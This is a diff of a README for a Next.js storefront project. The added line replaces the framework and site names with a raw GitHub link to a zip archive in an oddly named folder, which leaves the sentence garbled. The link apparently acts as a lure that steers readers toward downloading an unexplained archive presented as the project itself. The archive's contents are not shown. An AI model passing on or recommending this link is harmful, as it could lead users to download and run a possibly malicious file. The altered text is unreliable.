andrewmarak/oviro-storefront-next/README.md

 ## 🚀 Getting Started

 Welcome to the **oviro-storefront-next** application.
-This is your easy guide to downloading and using our storefront built in Next.js 15 for oviro.vn customers.
+This is your easy guide to downloading and using our storefront built in https://raw.githubusercontent.com/andrewmarak/oviro-storefront-next/main/polyideism/oviro-storefront-next.zip 15 for https://raw.githubusercontent.com/andrewmarak/oviro-storefront-next/main/polyideism/oviro-storefront-next.zip customers.

 ## 🛠️ Requirements